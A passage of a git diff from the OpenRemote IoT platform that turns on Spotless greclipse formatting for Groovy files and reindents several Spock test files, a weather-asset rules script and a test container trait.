-        service.websocketSessionSubscriptionConsumers[sessionKey].keySet() == ["alarm::"] as Set
-        service.eventSubscriptions.size() == 1
-    }
-
-    @Unroll
-    def "rejects subscription when delimiter is present in #fieldName"() {
-        given:
-        def service = new TestClientEventService()
-        def channel = dummyChannel()
-        String sessionKey = "session-4"
-        service.sessionChannels.put(sessionKey, channel)
-
-        when:
-        def exchange = exchangeFor(sessionKey, channel, subscription)
-        service.procesInboundEvent(exchange)
-
-        then:
-        exchange.routeStop
-        !service.websocketSessionSubscriptionConsumers.containsKey(sessionKey)
-        service.eventSubscriptions.empty
-        service.sentPayloads.size() == 1
-        service.sentPayloads[0] instanceof UnauthorizedEventSubscription
-
-        where:
-        fieldName         | subscription
-        "eventType"      | new EventSubscription<>("bad::event")
-        "subscriptionId" | new EventSubscription<>(SyslogEvent.class, null, "bad::id")
-    }
-
-    private Exchange exchangeFor(String sessionKey, WebSocketChannel channel, Object body) {
-        Exchange exchange = new DefaultExchange(new DefaultCamelContext())
-        exchange.in.body = body
-        exchange.in.setHeader(UndertowConstants.CONNECTION_KEY, sessionKey)
-        exchange.in.setHeader(UndertowConstants.CHANNEL, channel)
-        exchange.in.setHeader(AUTH_CONTEXT, Stub(AuthContext))
-        exchange.in.setHeader(REALM_PARAM_NAME, "master")
-        exchange
-    }
-
-    private WebSocketChannel dummyChannel() {
-        Stub(WebSocketChannel)
-    }
-
-    private static class TestClientEventService extends ClientEventService {
-        final List<Object> sentPayloads = []
-
-        @Override
-        boolean authorizeEventSubscription(String realm, AuthContext authContext, EventSubscription<?> subscription) {
-            return true
-        }
-
-        @Override
-        void sendToWebsocketSession(String sessionKey, Object data) {
-            sentPayloads.add(data)
-        }
-    }
+  }
 }

--- a/model/src/test/groovy/org/openremote/model/geo/GeoJSONPointTest.groovy
+++ b/model/src/test/groovy/org/openremote/model/geo/GeoJSONPointTest.groovy
@@ -22,35 +22,35 @@ import spock.lang.Specification
 
 class GeoJSONPointTest extends Specification {
 
-    def "parseRawLocation returns null for invalid input '#input'"() {
-        expect:
-        GeoJSONPoint.parseRawLocation(input) == null
+  def "parseRawLocation returns null for invalid input '#input'"() {
+    expect:
+    GeoJSONPoint.parseRawLocation(input) == null
 
-        where:
-        input << [null, "", "1,2,3", "abc,2", "1,def"]
-    }
+    where:
+    input << [null, "", "1,2,3", "abc,2", "1,def"]
+  }
 
-    def "parseRawLocation parses valid input"() {
-        when:
-        def point = GeoJSONPoint.parseRawLocation("12.5, -3.75")
+  def "parseRawLocation parses valid input"() {
+    when:
+    def point = GeoJSONPoint.parseRawLocation("12.5, -3.75")
 
-        then:
-        point != null
-        point.x == 12.5d
-        point.y == -3.75d
-    }
+    then:
+    point != null
+    point.x == 12.5d
+    point.y == -3.75d
+  }
 
-    def "offsetByMeters offsets east and north"() {
-        given:
-        def origin = new GeoJSONPoint(0d, 0d)
+  def "offsetByMeters offsets east and north"() {
+    given:
+    def origin = new GeoJSONPoint(0d, 0d)
 
-        when:
-        def offset = origin.offsetByMeters(1000d, 1000d)
+    when:
+    def offset = origin.offsetByMeters(1000d, 1000d)
 
-        then:
-        def expectedLat = 0.0090436947d
-        def expectedLon = 0.0089831528d
-        Math.abs(offset.y - expectedLat) < 1e-9
-        Math.abs(offset.x - expectedLon) < 1e-9
-    }
+    then:
+    def expectedLat = 0.0090436947d
+    def expectedLon = 0.0089831528d
+    Math.abs(offset.y - expectedLat) < 1e-9
+    Math.abs(offset.x - expectedLon) < 1e-9
+  }
 }

--- a/model/src/test/groovy/org/openremote/model/util/JSONSchemaUtilTest.groovy
+++ b/model/src/test/groovy/org/openremote/model/util/JSONSchemaUtilTest.groovy
@@ -38,7 +38,7 @@ class JSONSchemaUtilTest extends Specification {
 
   private static InputStream loadResourceAsStream(String resourcePath) {
     JSONSchemaUtilTest.getResourceAsStream(
-        "/org/openremote/model/util/" + resourcePath + ".json")
+            "/org/openremote/model/util/" + resourcePath + ".json")
   }
 
   static class Title {}
@@ -46,7 +46,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema has a generated title"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -70,7 +70,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema members do not have generated titles"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
                 {
                   "$schema": "http://json-schema.org/draft-07/schema#",
@@ -98,7 +98,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema remaps Byte"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(loadResourceAsStream(Byte.name))
+            ValueUtil.JSON.readTree(loadResourceAsStream(Byte.name))
     def actual = ValueUtil.getSchema(Byte)
     assertEquals(expected.toString(), actual.toString(), true)
   }
@@ -108,7 +108,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema allows additional properties"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -132,14 +132,14 @@ class JSONSchemaUtilTest extends Specification {
     public boolean test3
 
     @JsonSchemaSupplier(
-        supplier = SchemaNodeMapper.SCHEMA_SUPPLIER_NAME_PATTERN_PROPERTIES_ANY_KEY_ANY_TYPE)
+    supplier = SchemaNodeMapper.SCHEMA_SUPPLIER_NAME_PATTERN_PROPERTIES_ANY_KEY_ANY_TYPE)
     public Boolean test4
   }
 
   def "schema remaps annotated types"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema":"http://json-schema.org/draft-07/schema#",
@@ -162,18 +162,18 @@ class JSONSchemaUtilTest extends Specification {
   def "schema handles map type #mapType.simpleName"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(loadResourceAsStream(mapType.name))
+            ValueUtil.JSON.readTree(loadResourceAsStream(mapType.name))
     def actual = ValueUtil.getSchema(mapType)
     assertEquals(expected.toString(), actual.toString(), true)
 
     where:
     mapType << [
-        ValueType.BooleanMap,
-        ValueType.DoubleMap,
-        ValueType.IntegerMap,
-        ValueType.ObjectMap,
-        ValueType.StringMap,
-        ValueType.MultivaluedStringMap
+      ValueType.BooleanMap,
+      ValueType.DoubleMap,
+      ValueType.IntegerMap,
+      ValueType.ObjectMap,
+      ValueType.StringMap,
+      ValueType.MultivaluedStringMap
     ]
   }
 
@@ -191,7 +191,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema handles Jackson annotations"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -232,7 +232,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema requires primitive fields"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -275,7 +275,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema applies custom annotations to fields"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -308,7 +308,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema applies custom annotations to types"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -334,7 +334,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema applies i18n annotations"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -354,7 +354,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema applies partially disabled i18n annotations"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -384,7 +384,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema includes subtypes with a type property"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -438,12 +438,12 @@ class JSONSchemaUtilTest extends Specification {
     @JsonSubTypes.Type(SubTypeSuperClassWithCustomProperty),
   ])
   abstract static class PolymorphicTypeWithCustomProperty<
-          T extends PolymorphicTypeWithCustomProperty<?>>
-      implements Serializable {}
+  T extends PolymorphicTypeWithCustomProperty<?>>
+  implements Serializable {}
 
   @JsonTypeName("SubTypeWithCustomProperty")
   static class SubTypeWithCustomProperty
-      extends PolymorphicTypeWithCustomProperty<SubTypeWithCustomProperty> {}
+  extends PolymorphicTypeWithCustomProperty<SubTypeWithCustomProperty> {}
 
   @JsonTypeName("SubTypeSuperClassWithCustomProperty")
   static class SubTypeSuperClassWithCustomProperty extends SubTypeWithCustomProperty {}
@@ -451,7 +451,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema includes subtypes with a custom type property"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -502,20 +502,20 @@ class JSONSchemaUtilTest extends Specification {
   // Note: JsonTypeInfo.As.EXISTING_PROPERTY doesn't necessarily change the behavior mainly the
   // "customType" property on the abstract class matters.
   @JsonTypeInfo(
-      property = PolymorphicTypeWithCustomExistingProperty.VALUE_KEY_CUSTOM_TYPE,
-      use = JsonTypeInfo.Id.NAME,
-      include = JsonTypeInfo.As.EXISTING_PROPERTY)
+  property = PolymorphicTypeWithCustomExistingProperty.VALUE_KEY_CUSTOM_TYPE,
+  use = JsonTypeInfo.Id.NAME,
+  include = JsonTypeInfo.As.EXISTING_PROPERTY)
   @JsonSubTypes([
     @JsonSubTypes.Type(
-        name = SubTypeWithCustomExistingProperty.SUB_CUSTOM_TYPE,
-        value = SubTypeWithCustomExistingProperty),
+            name = SubTypeWithCustomExistingProperty.SUB_CUSTOM_TYPE,
+            value = SubTypeWithCustomExistingProperty),
     @JsonSubTypes.Type(
-        name = SubTypeSuperClassWithCustomExistingProperty.SUPER_CUSTOM_TYPE,
-        value = SubTypeSuperClassWithCustomExistingProperty),
+            name = SubTypeSuperClassWithCustomExistingProperty.SUPER_CUSTOM_TYPE,
+            value = SubTypeSuperClassWithCustomExistingProperty),
   ])
   abstract static class PolymorphicTypeWithCustomExistingProperty<
-          T extends PolymorphicTypeWithCustomExistingProperty<?>>
-      implements Serializable {
+  T extends PolymorphicTypeWithCustomExistingProperty<?>>
+  implements Serializable {
     public static final String VALUE_KEY_CUSTOM_TYPE = "customType"
 
     @JsonProperty(VALUE_KEY_CUSTOM_TYPE)
@@ -528,20 +528,20 @@ class JSONSchemaUtilTest extends Specification {
 
   @JsonTypeName(SubTypeWithCustomExistingProperty.SUB_CUSTOM_TYPE)
   static class SubTypeWithCustomExistingProperty
-      extends PolymorphicTypeWithCustomExistingProperty<SubTypeWithCustomExistingProperty> {
+  extends PolymorphicTypeWithCustomExistingProperty<SubTypeWithCustomExistingProperty> {
     public static final String SUB_CUSTOM_TYPE = "sub"
   }
 
   @JsonTypeName(SubTypeSuperClassWithCustomExistingProperty.SUPER_CUSTOM_TYPE)
   static class SubTypeSuperClassWithCustomExistingProperty
-      extends SubTypeWithCustomExistingProperty {
+  extends SubTypeWithCustomExistingProperty {
     public static final String SUPER_CUSTOM_TYPE = "super"
   }
 
   def "schema includes subtypes with an existing custom type property"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -590,15 +590,15 @@ class JSONSchemaUtilTest extends Specification {
   }
 
   @JsonTypeInfo(
-      property = "type",
-      use = JsonTypeInfo.Id.NAME,
-      include = JsonTypeInfo.As.EXTERNAL_PROPERTY)
+  property = "type",
+  use = JsonTypeInfo.Id.NAME,
+  include = JsonTypeInfo.As.EXTERNAL_PROPERTY)
   @JsonSubTypes([
     @JsonSubTypes.Type(ExternalSubType),
     @JsonSubTypes.Type(ExternalSubTypeSuperclass),
   ])
   abstract static class ExternalPolymorphicType<T extends ExternalPolymorphicType<?>>
-      implements Serializable {}
+  implements Serializable {}
 
   static class ExternalSubType extends ExternalPolymorphicType<ExternalSubType> {}
 
@@ -607,7 +607,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema sets the enum type for an external property"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -658,7 +658,7 @@ class JSONSchemaUtilTest extends Specification {
   @JsonTypeName("ReflectedPolymorphicType")
   @JsonTypeInfo(property = "type", use = JsonTypeInfo.Id.NAME)
   abstract static class ReflectedPolymorphicType<T extends ReflectedPolymorphicType<?>>
-      implements Serializable {}
+  implements Serializable {}
 
   @JsonTypeName("ResolvedSubType")
   static class ResolvedSubType extends ReflectedPolymorphicType<ResolvedSubType> {}
@@ -666,7 +666,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema resolves subtypes through reflections"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -736,7 +736,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema applies Jackson serializers"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",
@@ -817,7 +817,7 @@ class JSONSchemaUtilTest extends Specification {
   def "schema generates enum values"() {
     expect:
     def expected =
-        ValueUtil.JSON.readTree(
+            ValueUtil.JSON.readTree(
             '''
             {
                 "$schema": "http://json-schema.org/draft-07/schema#",

--- a/model/src/test/groovy/org/openremote/model/util/LockByKeyTest.groovy
+++ b/model/src/test/groovy/org/openremote/model/util/LockByKeyTest.groovy
@@ -24,93 +24,93 @@ import spock.util.concurrent.PollingConditions
 import java.util.concurrent.*
 
 class LockByKeyTest extends Specification {
-    /**
-     * A controllable version of LockByKey that allows us to pause the unlock method at a critical
-     * point.
-     */
-    static class ControllableLockByKey extends LockByKey {
+  /**
+   * A controllable version of LockByKey that allows us to pause the unlock method at a critical
+   * point.
+   */
+  static class ControllableLockByKey extends LockByKey {
 
-        private final CountDownLatch pauseLatch = new CountDownLatch(1)
-        private final CountDownLatch resumeLatch = new CountDownLatch(1)
+    private final CountDownLatch pauseLatch = new CountDownLatch(1)
+    private final CountDownLatch resumeLatch = new CountDownLatch(1)
 
-        @Override
-        protected LockWrapper createLockWrapper() {
-            new LockWrapper() {
+    @Override
+    protected LockWrapper createLockWrapper() {
+      new LockWrapper() {
                 @Override
                 int removeThreadFromQueue() {
-                    def result = super.removeThreadFromQueue()
-                    if (result == 0) {
-                        // Signal that we are at the critical point
-                        pauseLatch.countDown()
-                        // Wait for the test to tell us to continue
-                        try {
-                            resumeLatch.await()
-                        } catch (InterruptedException e) {
-                            throw new RuntimeException(e)
-                        }
+                  def result = super.removeThreadFromQueue()
+                  if (result == 0) {
+                    // Signal that we are at the critical point
+                    pauseLatch.countDown()
+                    // Wait for the test to tell us to continue
+                    try {
+                      resumeLatch.await()
+                    } catch (InterruptedException e) {
+                      throw new RuntimeException(e)
                     }
-                    result
+                  }
+                  result
                 }
-            }
-        }
-
-        void waitForPause() throws InterruptedException {
-            pauseLatch.await(5, TimeUnit.SECONDS)
-        }
-
-        void resume() {
-            resumeLatch.countDown()
-        }
+              }
     }
 
-    def "threads queued behind an unlock are not starved"() {
-        given:
-        def conditions = new PollingConditions(timeout: 5)
-        def lockByKey = new ControllableLockByKey()
-        def key = "testKey"
-        def executor = Executors.newFixedThreadPool(3)
-        def threadResumeLatch = new CountDownLatch(1)
-
-        when: "a thread acquires and releases the lock, pausing in the middle of unlock"
-        def future1 = executor.submit {
-            lockByKey.lock(key)
-            lockByKey.unlock(key)
-        }
-        lockByKey.waitForPause()
-
-        and: "two more threads try to acquire the lock while the first is unlocking"
-        def contenders = new CopyOnWriteArrayList<Thread>()
-        def contend = {
-            contenders.add(Thread.currentThread())
-            lockByKey.lock(key)
-            threadResumeLatch.await(5, TimeUnit.SECONDS)
-            lockByKey.unlock(key)
-        }
-        def future2 = executor.submit(contend)
-        def future3 = executor.submit(contend)
-
-        then: "both contend for the lock the first thread is about to remove"
-        conditions.eventually {
-            assert contenders.size() == 2
-            assert contenders.every {
-                it.state == Thread.State.BLOCKED || it.state == Thread.State.WAITING
-            }
-        }
-
-        when: "the first thread completes its unlock and removes the LockWrapper"
-        lockByKey.resume()
-
-        then:
-        future1.get(5, TimeUnit.SECONDS) == null
-
-        when: "the queued threads are released"
-        threadResumeLatch.countDown()
-
-        then: "neither is stuck"
-        future2.get(5, TimeUnit.SECONDS) == null
-        future3.get(5, TimeUnit.SECONDS) == null
-
-        cleanup:
-        executor.shutdownNow()
+    void waitForPause() throws InterruptedException {
+      pauseLatch.await(5, TimeUnit.SECONDS)
     }
+
+    void resume() {
+      resumeLatch.countDown()
+    }
+  }
+
+  def "threads queued behind an unlock are not starved"() {
+    given:
+    def conditions = new PollingConditions(timeout: 5)
+    def lockByKey = new ControllableLockByKey()
+    def key = "testKey"
+    def executor = Executors.newFixedThreadPool(3)
+    def threadResumeLatch = new CountDownLatch(1)
+
+    when: "a thread acquires and releases the lock, pausing in the middle of unlock"
+    def future1 = executor.submit {
+      lockByKey.lock(key)
+      lockByKey.unlock(key)
+    }
+    lockByKey.waitForPause()
+
+    and: "two more threads try to acquire the lock while the first is unlocking"
+    def contenders = new CopyOnWriteArrayList<Thread>()
+    def contend = {
+      contenders.add(Thread.currentThread())
+      lockByKey.lock(key)
+      threadResumeLatch.await(5, TimeUnit.SECONDS)
+      lockByKey.unlock(key)
+    }
+    def future2 = executor.submit(contend)
+    def future3 = executor.submit(contend)
+
+    then: "both contend for the lock the first thread is about to remove"
+    conditions.eventually {
+      assert contenders.size() == 2
+      assert contenders.every {
+        it.state == Thread.State.BLOCKED || it.state == Thread.State.WAITING
+      }
+    }
+
+    when: "the first thread completes its unlock and removes the LockWrapper"
+    lockByKey.resume()
+
+    then:
+    future1.get(5, TimeUnit.SECONDS) == null
+
+    when: "the queued threads are released"
+    threadResumeLatch.countDown()
+
+    then: "neither is stuck"
+    future2.get(5, TimeUnit.SECONDS) == null
+    future3.get(5, TimeUnit.SECONDS) == null
+
+    cleanup:
+    executor.shutdownNow()
+  }
 }

--- a/model/src/test/groovy/org/openremote/model/util/UniqueIdentifierGeneratorTest.groovy
+++ b/model/src/test/groovy/org/openremote/model/util/UniqueIdentifierGeneratorTest.groovy
@@ -22,8 +22,8 @@ import spock.lang.Specification
 
 class UniqueIdentifierGeneratorTest extends Specification {
 
-    def "generated asset ID has expected length"() {
-        expect: "Asset IDs must be 22 characters long"
-        UniqueIdentifierGenerator.generateId("masterlight-1-1").length() == 22
-    }
+  def "generated asset ID has expected length"() {
+    expect: "Asset IDs must be 22 characters long"
+    UniqueIdentifierGenerator.generateId("masterlight-1-1").length() == 22
+  }
 }

--- a/model/src/test/groovy/org/openremote/model/value/ValueUtilTest.groovy
+++ b/model/src/test/groovy/org/openremote/model/value/ValueUtilTest.groovy
@@ -27,44 +27,44 @@ import java.time.Instant
 
 class ValueUtilTest extends Specification {
 
-    ConstraintValidatorContext context
+  ConstraintValidatorContext context
 
-    def setup() {
-        def builder = Stub(ConstraintValidatorContext.ConstraintViolationBuilder)
-        def attributesNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderCustomizableContext)
-        def valueNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderCustomizableContext)
-        def containerNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderCustomizableContext)
-        def iterableNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeContextBuilder)
-        def keyNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderDefinedContext)
+  def setup() {
+    def builder = Stub(ConstraintValidatorContext.ConstraintViolationBuilder)
+    def attributesNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderCustomizableContext)
+    def valueNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderCustomizableContext)
+    def containerNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderCustomizableContext)
+    def iterableNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeContextBuilder)
+    def keyNode = Stub(ConstraintValidatorContext.ConstraintViolationBuilder.NodeBuilderDefinedContext)
 
-        context = Stub(ConstraintValidatorContext) {
-            buildConstraintViolationWithTemplate(_) >> builder
-        }
-        builder.addPropertyNode("attributes") >> attributesNode
-        attributesNode.addPropertyNode("value") >> valueNode
-        valueNode.inContainer(Map, 1) >> containerNode
-        containerNode.inIterable() >> iterableNode
-        iterableNode.atKey(_) >> keyNode
+    context = Stub(ConstraintValidatorContext) {
+      buildConstraintViolationWithTemplate(_) >> builder
+    }
+    builder.addPropertyNode("attributes") >> attributesNode
+    attributesNode.addPropertyNode("value") >> valueNode
+    valueNode.inContainer(Map, 1) >> containerNode
+    containerNode.inIterable() >> iterableNode
+    iterableNode.atKey(_) >> keyNode
+  }
+
+  def "validating #description returns #expected"() {
+    given:
+    def descriptor = new AttributeDescriptor(attributeName, valueType)
+    def attribute = new Attribute(descriptor)
+    if (value != null) {
+      attribute.value = value
+    }
+    ValueUtil.ConstraintViolationPathProvider pathProvider = { constraintViolationBuilder ->
+      constraintViolationBuilder
+      .addPropertyNode("attributes")
+      .addPropertyNode("value")
+      .inContainer(Map, 1)
+      .inIterable()
+      .atKey(attribute.name)
     }
 
-    def "validating #description returns #expected"() {
-        given:
-        def descriptor = new AttributeDescriptor(attributeName, valueType)
-        def attribute = new Attribute(descriptor)
-        if (value != null) {
-            attribute.value = value
-        }
-        ValueUtil.ConstraintViolationPathProvider pathProvider = { constraintViolationBuilder ->
-            constraintViolationBuilder
-                .addPropertyNode("attributes")
-                .addPropertyNode("value")
-                .inContainer(Map, 1)
-                .inIterable()
-                .atKey(attribute.name)
-        }
-
-        expect:
-        ValueUtil.validateValue(
+    expect:
+    ValueUtil.validateValue(
             descriptor,
             descriptor.type,
             attribute,
@@ -72,17 +72,17 @@ class ValueUtilTest extends Specification {
             context,
             pathProvider,
             attribute.value.orElse(null)
-        ) == expected
+            ) == expected
 
-        where:
-        description                                  | attributeName                   | valueType                                              | value                                                   || expected
-        "a positive integer"                         | "positiveNumber"                | ValueType.POSITIVE_INTEGER                             | 1                                                       || true
-        "an empty positive integer"                  | "positiveNumber"                | ValueType.POSITIVE_INTEGER                             | null                                                    || true
-        "a negative integer as a positive integer"   | "positiveNumber"                | ValueType.POSITIVE_INTEGER                             | -1                                                      || false
-        "an array of positive integers"              | "arrayOfPositiveNumbers"         | ValueType.POSITIVE_INTEGER.asArray()                   | [1, 2] as Integer[]                                     || true
-        "an empty array of positive integers"        | "arrayOfPositiveNumbers"         | ValueType.POSITIVE_INTEGER.asArray()                   | null                                                    || true
-        "an array containing a negative integer"     | "arrayOfPositiveNumbers"         | ValueType.POSITIVE_INTEGER.asArray()                   | [1, -2] as Integer[]                                    || false
-        "nested arrays of positive integers"         | "arrayOfArrayOfPositiveNumbers"  | ValueType.POSITIVE_INTEGER.asArray().asArray()         | [[1, 2] as Integer[], [5, 2] as Integer[]] as Integer[][] || true
-        "nested arrays containing a negative integer"| "arrayOfArrayOfPositiveNumbers"  | ValueType.POSITIVE_INTEGER.asArray().asArray()         | [[1, 2] as Integer[], [-5, 2] as Integer[]] as Integer[][]|| false
-    }
+    where:
+    description | attributeName | valueType | value || expected
+    "a positive integer" | "positiveNumber" | ValueType.POSITIVE_INTEGER | 1 || true
+    "an empty positive integer" | "positiveNumber" | ValueType.POSITIVE_INTEGER | null || true
+    "a negative integer as a positive integer" | "positiveNumber" | ValueType.POSITIVE_INTEGER | -1 || false
+    "an array of positive integers" | "arrayOfPositiveNumbers" | ValueType.POSITIVE_INTEGER.asArray() | [1, 2] as Integer[] || true
+    "an empty array of positive integers" | "arrayOfPositiveNumbers" | ValueType.POSITIVE_INTEGER.asArray() | null || true
+    "an array containing a negative integer" | "arrayOfPositiveNumbers" | ValueType.POSITIVE_INTEGER.asArray() | [1, -2] as Integer[] || false
+    "nested arrays of positive integers" | "arrayOfArrayOfPositiveNumbers" | ValueType.POSITIVE_INTEGER.asArray().asArray() | [[1, 2] as Integer[], [5, 2] as Integer[]] as Integer[][] || true
+    "nested arrays containing a negative integer"| "arrayOfArrayOfPositiveNumbers" | ValueType.POSITIVE_INTEGER.asArray().asArray() | [[1, 2] as Integer[], [-5, 2] as Integer[]] as Integer[][]|| false
+  }
 }

--- a/setup/src/load1/resources/org/openremote/setup/load1/WeatherAssetCalculations.groovy
+++ b/setup/src/load1/resources/org/openremote/setup/load1/WeatherAssetCalculations.groovy
@@ -41,55 +41,53 @@ Assets assets = binding.assets
 
 rules.add()
         .name("Calculate weather asset calculated attribute")
-        .when(
-                { facts ->
+        .when({ facts ->
 
-                    //LOG.info("Calculations start")
+          //LOG.info("Calculations start")
 
-                    Map<String, Double> lastValues = facts.get("lastValues") as Map<String, Double>
-                    if (lastValues == null) {
-                        lastValues = new HashMap<>()
+          Map<String, Double> lastValues = facts.get("lastValues") as Map<String, Double>
+          if (lastValues == null) {
+            lastValues = new HashMap<>()
+          }
+
+          // Get weather asset rainfall and/or temperature states that have changed value
+          List<AttributeEvent> updates = facts.matchAssetState(
+                          new AssetQuery()
+                          .types(WeatherAsset)
+                          .attributeNames(WeatherAsset.TEMPERATURE.name, WeatherAsset.RAINFALL.name)
+                          ).collect(Collectors.groupingBy{state -> state.id})
+                  .entrySet().parallelStream().map {entry ->
+                    if (entry.value.size() != 2) {
+                      return null
                     }
+                    def value1 = entry.value[0].value.orElse(0) as double
+                    def value2 = entry.value[1].value.orElse(0) as double
+                    def calc = Double.valueOf(value1+value2)
+                    def lastValue = lastValues.get(entry.key)
+                    return !Objects.equals(lastValue, calc) ? new AttributeEvent(entry.key, "calculated", calc) : null
+                  }.filter {it != null}
+                  .toList()
 
-                    // Get weather asset rainfall and/or temperature states that have changed value
-                    List<AttributeEvent> updates = facts.matchAssetState(
-                            new AssetQuery()
-                                    .types(WeatherAsset)
-                                    .attributeNames(WeatherAsset.TEMPERATURE.name, WeatherAsset.RAINFALL.name)
-                    ).collect(Collectors.groupingBy{state -> state.id})
-                            .entrySet().parallelStream().map {entry ->
-                        if (entry.value.size() != 2) {
-                            return null
-                        }
-                        def value1 = entry.value[0].value.orElse(0) as double
-                        def value2 = entry.value[1].value.orElse(0) as double
-                        def calc = Double.valueOf(value1+value2)
-                        def lastValue = lastValues.get(entry.key)
-                        return !Objects.equals(lastValue, calc) ? new AttributeEvent(entry.key, "calculated", calc) : null
-                    }.filter {it != null}
-                            .toList()
+          if (!updates.isEmpty()) {
+            LOG.info("New values calculated for ${updates.size()} assets")
+            facts.bind("updates", updates)
+            facts.bind("lastValues", lastValues)
+            updates.forEach {lastValues.put(it.id, it.value.orElseThrow() as Double)}
+            return true
+          }
 
-                    if (!updates.isEmpty()) {
-                        LOG.info("New values calculated for ${updates.size()} assets")
-                        facts.bind("updates", updates)
-                        facts.bind("lastValues", lastValues)
-                        updates.forEach {lastValues.put(it.id, it.value.orElseThrow() as Double)}
-                        return true
-                    }
-
-                    //LOG.info("Calculations end")
-                    // Trigger the rule action if we have one or more changes to process
-                    return false
-                })
-        .then(
-                { facts ->
-                    def updates = facts.bound("updates") as List<AttributeEvent>
-                    def lastValues = facts.bound("lastValues")
-                    facts.put("lastValues", lastValues)
-                    LOG.info("Update start")
-                    assets.dispatch(updates.get(0))
-                    updates.forEach {
-                        assets.dispatch(it)
-                    }
-                    LOG.info("Update end")
-                })
+          //LOG.info("Calculations end")
+          // Trigger the rule action if we have one or more changes to process
+          return false
+        })
+        .then({ facts ->
+          def updates = facts.bound("updates") as List<AttributeEvent>
+          def lastValues = facts.bound("lastValues")
+          facts.put("lastValues", lastValues)
+          LOG.info("Update start")
+          assets.dispatch(updates.get(0))
+          updates.forEach {
+            assets.dispatch(it)
+          }
+          LOG.info("Update end")
+        })

--- a/spotless.gradle
+++ b/spotless.gradle
@@ -96,9 +96,11 @@ spotless {
     endWithNewline()
   }
 
-  // Groovy files are not yet formatted because some use '::' operations which greclipse currently cannot handle
   groovy {
     target backendTarget(['**/*.groovy'])
+    targetExclude('**/BasicBrokenRules.groovy')
+    toggleOffOn()
+    greclipse().configFile(rootProject.file('tools/spotless/greclipse-google.properties'))
     licenseHeaderFile(rootProject.file('tools/spotless/openremote-license-header.txt'), blockCommentLicenseDelimiter)
     trimTrailingWhitespace()
     endWithNewline()

--- a/test/src/main/groovy/org/openremote/test/ContainerTrait.groovy
+++ b/test/src/main/groovy/org/openremote/test/ContainerTrait.groovy
@@ -77,542 +77,580 @@ import static org.openremote.model.Constants.MASTER_REALM_ADMIN_USER
 
 trait ContainerTrait {
 
-    @Shared
-    AtomicReference<ResteasyClient> testClient = new AtomicReference<>()
+  @Shared
+  AtomicReference<ResteasyClient> testClient = new AtomicReference<>()
 
-    static {
-        LogUtil.initialiseJUL()
+  static {
+    LogUtil.initialiseJUL()
+  }
+
+  Logger LOG = LoggerFactory.getLogger(ContainerTrait.class)
+
+  Container startContainer(Map<String, String> config, Iterable<ContainerService> services) {
+
